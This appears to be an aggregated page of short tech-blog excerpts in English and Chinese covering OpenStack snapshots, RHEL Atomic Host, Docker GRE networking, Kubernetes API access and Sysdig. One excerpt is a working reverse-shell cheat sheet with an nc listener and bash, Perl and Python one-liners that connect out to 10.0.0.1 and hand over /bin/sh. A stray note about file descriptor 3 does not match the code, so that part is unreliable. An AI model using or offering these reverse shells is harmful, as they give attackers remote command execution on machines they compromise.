A while back, I wrote an article about taking consistent snapshots of your virtual machines in your OpenStack environment. However this method was really intrusive since it required to be inside the virtual machine and to manually summon a filesystem freeze. In this article, I will use a different approach to achieve the same goal without the need to be inside the virtual machine.
The only requirement is to have a virtual machine running the qemu-guest-agent.
... ➦已经融资9500万美元的Pluribus公司,做得Server Switch产品,其CEO说,既能克服Vmware产品的scalability, invisibility, performance问题,又能克服Cisco ACI的系统封闭性。说白了就是把网络做在服务器里面,但是网络处理发生在交换芯片而不是CPU里面,跟Facebook Wedge一样 @盛科张卫峰
... ➦__file__仅在文件中运行的时候才正常,而在交互式命令行中则需要使用变通的方法:
import os
import inspect
import sys
if not hasattr(sys.modules[__name__], '__file__'):
__file__ = inspect.getfile(inspect.currentframe())
print os.path.dirname(os.path.abspath(__file__))
Red Hat has announced first public beta of Red Hat Enterprise Linux 7 Atomic Host. The beta is available from Red Hat and on Amazon Web Services and Google Compute Platform.
What can you expect from the Red Hat Enterprise Linux 7 Atomic Host Beta?
Red Hat Enterprise Linux 7 Atomic Host Beta provides a streamlined host platform that is optimized to run application containers. The software components included in Red Hat Enterprise Linux 7 Atomic Host Beta, as well as the default system tunings, have been designed to enhance the performance, scalability and security of containers, giving you the optimal platform on which to deploy and run application containers.
... ➦nc -l -p 8080 -vvv
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There’s also an alternative PERL revere shell here.
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
... ➦首先修改Docker的默认网桥:
#停止Docker Daemon进程
systemctl stop docker
#设置默认网桥docker0为down,并删除
ip link set dev docker0 down
brctl delbr docker0
#新建Linux网桥localbr0
brctl addbr localbr0
#在每台主机上更改10.10.x.0/24,注意各台主机之间不要重复
ip addr add 10.10.2.1/24 dev localbr0
ip link set dev localbr0 up
echo 'OPTIONS="--bridge localbr0 --iptables=false"'>>/etc/sysconfig/docker
systemctl start Docker
为上述网桥添加GRE连接
... ➦You can enable kubernetes authentication by through this documentation. Then you happily access kube-apiserve by curl:
# curl -k -N -X GET -H "Authorization: Basic XXXXXXXXXX" http://localhost:8080/api/v1/namespaces/default/pods
{
"kind": "PodList",
"apiVersion": "v1",
"metadata": {
"selfLink": "/api/v1/namespaces/default/pods",
"resourceVersion": "74034"
},
"items": []
}
Nothing blocks this request! What is wrong? Wait a moment and checkout kubernetes documentation, I find this:
... ➦The Kubernetes API is served by the Kubernetes apiserver process. Typically, there is one of these running on a single kubernetes-master node.
Neutron里面的Floating IPs目前是基于iptables NAT来实现的,它使用ip_conntrack来跟踪所有连接(五元组),而ip_conntrack会大大降低NAT的性能,并且也有一些安全问题(比如conntrack未释放问题)。从Floating IPs的作用来看,它只需要完成源目的IP地址的转换即可,完全可以不需要conntrack,因而就有了一个Stateless Floating IPs的BP,
... ➦Sysdig captures system calls and other system level events using a linux kernel facility called tracepoints, providing a rich set of real-time, system-level information.
Sysdig “packetizes” this information, so that you can do things like save it into trace files and easily filter it, a bit like you would do with tcpdump. This makes it very flexible to explore what processes are doing.
Sysdig instruments your physical and virtual machines at the OS level by installing into the Linux kernel and capturing system calls and other OS events. Then, using sysdig’s command line interface, you can filter and decode these events in order to extract useful information. Sysdig can be used to inspect systems live in real-time, or to generate trace files that can be analyzed at a later stage.
... ➦